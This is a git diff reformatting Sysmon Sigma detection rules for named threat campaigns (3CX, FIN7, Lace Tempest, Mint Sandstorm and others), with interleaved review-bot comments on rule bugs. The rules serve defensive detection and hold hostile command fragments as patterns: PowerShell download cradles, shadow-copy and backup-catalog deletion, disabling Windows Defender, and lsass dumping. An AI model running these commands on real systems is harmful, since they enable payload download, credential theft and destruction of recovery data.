FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - sha1: + - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - 
3B43A5D8B83C637D00D769660D01333E88F5A187 + - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - md5: + - BB915073385DD16A846DFA318AFA3C19 + - 08D79E1FFFA244CC0DC61F7D2036ACA9 + - 4965EDF659753E3C05D800C6C8A23A7A + - 9833A4779B69B38E3E51F04E395674C6 + - 704DB9184700481A56E5100FB56496CE + - 8EE6802F085F7A9DF7E0303E65722DC0 + - F3D4144860CA10BA60F7EF4D176CC736 + - 0EEB1C0133EB4D571178B2D9D14CE3E9 selection_pe_1: - - OriginalFileName: 3CXDesktopApp.exe - - Image|endswith: \3CXDesktopApp.exe - - Product: 3CX Desktop App + - OriginalFileName: 3CXDesktopApp.exe + - Image|endswith: \3CXDesktopApp.exe + - Product: 3CX Desktop App selection_pe_2: FileVersion|contains: 18.12. condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml index e82fb7914..95fb7aba6 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml 
@@ -1,23 +1,22 @@ title: Potential Suspicious Child Process Of 3CXDesktopApp id: 63f3605b-979f-48c2-b7cc-7f90523fed88 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential suspicious child processes of "3CXDesktopApp.exe". - Which could be related to the 3CXDesktopApp supply chain compromise +description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml index aadbea068..ce9cdd410 100644 
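Review bot: The joined description is still a sentence fragment: `Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise`. Since the commit already rewrites this line, it could fix the punctuation at the same time: `description: Detects potential suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise`. The PaperCut pc-app rule later in this diff has the same `"pc-app.exe". Which could` construction.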
--- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml @@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Update Activity id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects the 3CXDesktopApp updater downloading a known compromised version - of the 3CXDesktopApp software +description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software references: - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats @@ -38,7 +37,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \3CXDesktopApp\app\update.exe - CommandLine|contains|all: + CommandLine|contains|all: - --update - http - /electron/update/win32/18.12 
diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml index 0725bc002..b1bc1a150 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml @@ -25,7 +25,6 @@ detection: - olidhealth.com condition: dns_query and selection falsepositives: - - Might generate some false positive if triggered by a user during investigation - for example. + - Might generate some false positive if triggered by a user during investigation for example. level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml index cccce5bbc..378ba552b 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml @@ -1,8 +1,7 @@ title: Diamond Sleet APT Process Activity Indicators id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2 status: experimental -description: Detects process creation activity indicators related to Diamond Sleet - APT +description: Detects process creation activity indicators related to Diamond Sleet APT references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' uTYNkfKxHiZrx3KJ' + CommandLine|contains: ' uTYNkfKxHiZrx3KJ' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml index e33ac9cac..dd7748d2c 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml @@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation - Registry id: 9f9f92ba-5300-43a4-b435-87d1ee571688 status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml b/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml index d9602f0a5..366f5d8ef 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml 
@@ -1,8 +1,7 @@ title: Potential APT FIN7 Related PowerShell Script Created id: a88d9f45-ec8a-4b0e-85ee-c9f6a65e9128 status: experimental -description: Detects PowerShell script file creation with specific name or suffix - which was seen being used often by FIN7 PowerShell scripts +description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,8 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: _64refl.ps1 - - TargetFilename: host_ip.ps1 + - TargetFilename|endswith: _64refl.ps1 + - TargetFilename: host_ip.ps1 condition: file_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml index 7b688b00d..8472cc1ad 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml 
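Review bot: `- TargetFilename: host_ip.ps1` in the re-indented selection is an exact match on the whole field, and for Sysmon Event ID 11 the TargetFilename field carries the full path, so as far as I can tell this item can never fire and only the `_64refl.ps1` entry is effective. The intent is presumably the same suffix match as the line above it: `- TargetFilename|endswith: \host_ip.ps1`. Worth confirming against the WithSecure report referenced in the rule before changing.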
@@ -1,8 +1,7 @@ title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e status: experimental -description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs - for reconnaissance and POWERTRASH execution +description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -noni -nop -exe bypass -f \\\\ - ADMIN$ selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - -ex bypass -noprof -nolog -nonint -f - C:\Windows\Temp\ condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml index ae30a024c..a94681333 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml 
@@ -1,8 +1,7 @@ title: Lace Tempest File Indicators id: e94486ea-2650-4548-bf25-88cbd0bb32d7 status: experimental -description: Detects PowerShell script file creation with specific names or suffixes - which was seen being used often in PowerShell scripts by FIN7 +description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: - - :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe - - :\Program Files\SysAidServer\tomcat\webapps\usersfiles.war - - :\Program Files\SysAidServer\tomcat\webapps\leave - - TargetFilename|contains: :\Program Files\SysAidServer\tomcat\webapps\user. + - TargetFilename|endswith: + - :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + - :\Program Files\SysAidServer\tomcat\webapps\usersfiles.war + - :\Program Files\SysAidServer\tomcat\webapps\leave + - TargetFilename|contains: :\Program Files\SysAidServer\tomcat\webapps\user. condition: file_event and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml index 2b991f6d0..6dcef6474 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml 
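Review bot: The description still says the rule detects `PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7`, but the title is "Lace Tempest File Indicators", the only reference is the SysAid advisory, and the selection in the next hunk matches `user.exe`, `usersfiles.war` and `leave` under `:\Program Files\SysAidServer\tomcat\webapps\`; the text looks copied from the FIN7 file-event rule earlier in this diff. Since the commit already rewrites the line, it should describe what is actually matched, e.g. `description: Detects the creation of files under the SysAid Server webapps directory with names reported as Lace Tempest indicators by the SysAid team`.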
@@ -1,8 +1,7 @@ title: Lace Tempest Cobalt Strike Download id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d status: experimental -description: Detects specific command line execution used by Lace Tempest to download - Cobalt Strike as reported by SysAid Team +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( - /a') condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml index e6ec56c66..a08f7a7c4 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml @@ -1,8 +1,7 @@ title: Lace Tempest Malware Loader Execution id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d status: experimental -description: Detects execution of a specific binary based on filename and hash used - by Lace Tempest to load additional malware as reported by SysAid Team +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml b/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml index 742449875..44d95d919 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml @@ -1,8 +1,7 @@ title: Lazarus APT DLL Sideloading Activity id: 24007168-a26b-4049-90d0-ce138e13a5cf status: experimental -description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in - the case of a Spanish aerospace company +description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company references: - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/ diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml index d00643ea5..6c84f7ba3 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml 
@@ -27,95 +27,94 @@ detection: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: Image|endswith: \wget.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_curl: Image|endswith: \curl.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add 
selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog - condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*)) + condition: process_creation and (selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml index 6d4a1f1ef..c873505cf 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml 
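Review bot: The regex in selection_special_child_powershell_cli now carries a literal en dash, `'[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'`, where the removed line spelled it as the escape `\u2013`; the two are equivalent, but the literal character is indistinguishable from a hyphen on screen and is easily normalised away by an editor or a non-UTF-8 pipeline. A trailing comment would keep the intent visible, e.g. `# first class: hyphen, slash, en dash (U+2013)`. The same change appears in the ManageEngine child-process rule that follows this one.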
@@ -29,101 +29,99 @@ detection: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: Image|endswith: \wget.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_curl: Image|endswith: \curl.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add 
selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - DisableRestrictedAdmin - - CurrentControlSet\Control\Lsa + - CommandLine|contains|all: + - reg add + - DisableAntiSpyware + - \Microsoft\Windows Defender + - CommandLine|contains|all: + - reg add + - DisableRestrictedAdmin + - CurrentControlSet\Control\Lsa selection_child_wmic_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - process call create selection_child_wmic_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - delete - shadowcopy selection_child_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin - delete - shadows selection_child_wbadmin: - CommandLine|contains|all: + CommandLine|contains|all: - wbadmin - delete - catalog filter_main: - CommandLine|contains|all: + CommandLine|contains|all: - download.microsoft.com - manageengine.com - msiexec - condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* - or all of selection_special_child_lsass_* or 1 of selection_child_*) and not - filter_main) + condition: process_creation and (all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main) falsepositives: - Unlikely level: critical diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml index 0f789bcc0..c6d48f180 100644 
--- a/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml @@ -1,8 +1,7 @@ title: Potential APT Mustang Panda Activity Against Australian Gov id: 7806bb49-f653-48d3-a915-5115c1a85234 status: experimental -description: Detects specific command line execution used by Mustang Panda in a targeted - attack against the Australian government as reported by Lab52 +description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 references: - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - copy SolidPDFCreator.dll - C:\Users\Public\Libraries\PhotoTvRHD\SolidPDFCreator.dll selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - \Windows\CurrentVersion\Run - SolidPDF diff --git a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml index 043ccd9c8..63b0cee51 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml 
@@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - powershell - -nop -w hidden @@ -27,7 +27,7 @@ detection: - setup.msi - -OutFile selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'msiexec ' - '/i ' - 'setup.msi ' diff --git a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml index 74e250f4d..ec104e160 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml @@ -1,8 +1,7 @@ title: PaperCut MF/NG Potential Exploitation id: 0934ac71-a331-4e98-a034-d49c491fbbcb status: test -description: Detects suspicious child processes of "pc-app.exe". Which could indicate - potential exploitation of PaperCut +description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software - https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml diff --git a/sigma/sysmon/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml 